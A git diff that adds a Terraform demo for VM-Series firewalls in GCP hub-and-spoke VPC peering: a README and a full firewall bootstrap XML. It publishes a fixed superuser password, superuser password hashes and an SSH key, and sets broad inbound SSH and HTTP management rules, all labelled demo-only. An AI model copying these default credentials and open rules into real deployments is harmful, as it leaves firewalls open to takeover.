+* 4 x VM-Series (BYOL / Bundle1 / Bundle2)
+* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation)
+* 1 x Ubuntu VM in spoke2 VPC
+* 1 x GCP Public Load Balancer (VM-Series as backend)
+* 1 x GCP Internal Load Balancer (spoke1 VM's as backend)
+* 1 x GCP Internal Load Balancer (VM-Series firewall 3 & 4 as backend)
+* 2 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv-peering-with-lbnh/images/Overview.png" width="550">
+</p>
+
+
+### Prerequistes 
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+     * **Username:** paloalto
+     * **Password:** Pal0Alt0@123
+
+### Deployment
+1.  Download the **adv-peering-with-lbnh** repo to the machine running the build
+2.  In an editor, open **variables.tf** and set values for the following variables
+
+| Variable        | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file`| Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3.  Download project authenication key files to the main directory of the terraform build.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv-peering-with-lbnh/images/directory.png" width="550">
+</p>
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes** 
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv-peering-with-lbnh/images/peering.png" width="550">
+</p>
+
+6. Remove default GCP VPC route for spoke1-vpc, spoke2-vpc, & trust-vpc
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv-peering-with-lbnh/images/routes.png" width="550">
+</p>
+
+7. From Terraform output, go to `GLB-ADDRESS = http://<glb_eip>` in a web browser.  NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv-peering-with-lbnh/images/web.png" width="550">
+</p>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..c9d7adda
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1068 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$omtpasik$JVuMCKVuxaIHBIkdrbR4k.</phash>
+      </entry>
+      <entry name="admin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.</phash>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <dhcp-client>
+                  <create-default-route>yes</create-default-route>
+                </dhcp-client>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <adjust-tcp-mss>
+                  <enable>yes</enable>
+                </adjust-tcp-mss>
+                <mtu>1460</mtu>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <adjust-tcp-mss>
+                  <enable>yes</enable>
+                </adjust-tcp-mss>
+                <mtu>1460</mtu>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <interface-management-profile>mgmt-profile</interface-management-profile>
+              </layer3>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="mgmt-profile">
+              <https>yes</https>
+              <http>yes</http>
+              <ping>yes</ping>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="outbound">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="svc1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.10.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="svc2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.10.2.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <hourly>
+                  <action>download-and-install</action>
+                  <at>15</at>
+                </hourly>
+              </recurring>
+            </threats>
+            <anti-virus>
+              <recurring>
+                <hourly>
+                  <action>download-and-install</action>
+                  <at>30</at>
+                </hourly>
+              </recurring>
+            </anti-virus>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vm-series</hostname>
+          <dns-setting>
+            <servers>
+              <primary>208.67.222.222</primary>
+              <secondary>208.67.220.220</secondary>
+            </servers>
+          </dns-setting>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <server-verification>yes</server-verification>
+          <motd-and-banner>
+            <motd-enable>no</motd-enable>
+          </motd-and-banner>
+          <login-banner>THIS IS A DEMO DEPLOYMENT
+DO NOT USE FOR PRODUCTION </login-banner>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="service-tcp-22">
+              <protocol>
+                <tcp>
+                  <port>22</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="service-tcp-221">
+              <protocol>
+                <tcp>
+                  <port>221</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="service-tcp-222">
+              <protocol>
+                <tcp>
+                  <port>222</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-223">
+              <protocol>
+                <tcp>
+                  <port>223</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="all ping">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ping</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-web">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>service-http</member>
+                    <member>service-https</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                  <disabled>no</disabled>
+                  <description>If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.</description>
+                </entry>
+                <entry name="east-west">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="inbound-80">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-http</service>
+                  <nat-type>ipv4</nat-type>
+                  <disabled>no</disabled>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="inbound-221">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-tcp-221</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-vm1</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="inbound-222">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-tcp-222</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-vm2</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="inbound-223">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>tcp-223</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="east-west">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <nat-type>ipv4</nat-type>
+                </entry>
+                <entry name="outbound">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <nat-type>ipv4</nat-type>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <profiles>
+            <vulnerability>
+              <entry name="Test Drive">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="31719">
+                    <action>
+                      <reset-client/>
+                    </action>
+                  </entry>
+                </threat-exception>
+                <description>WW's profile</description>
+              </entry>
+            </vulnerability>
+          </profiles>
+          <address>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.10.2.2</ip-netmask>
+              <tag>
+                <member>spoke2-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm1">
+              <ip-netmask>10.10.1.2</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vpc">
+              <ip-netmask>10.10.1.0/24</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vpc">
+              <ip-netmask>10.10.2.0/24</ip-netmask>
+              <tag>
+                <member>spoke2-vpc</member>
+              </tag>
+            </entry>
+            <entry name="fw1-untrust">
+              <ip-netmask>192.168.1.2</ip-netmask>
+            </entry>
+            <entry name="fw2-untrust">
+              <ip-netmask>192.168.1.3</ip-netmask>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.10.1.100</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm2">
+              <ip-netmask>10.10.1.3</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+          </address>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <tag>
+            <entry name="spoke2-vpc">
+              <color>color3</color>
+            </entry>
+            <entry name="spoke1-vpc">
+              <color>color24</color>
+            </entry>
+            <entry name="untrust-zone">
+              <color>color20</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+          </tag>
+          <profile-group/>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes
@@ -0,0 +1 @@
+ 
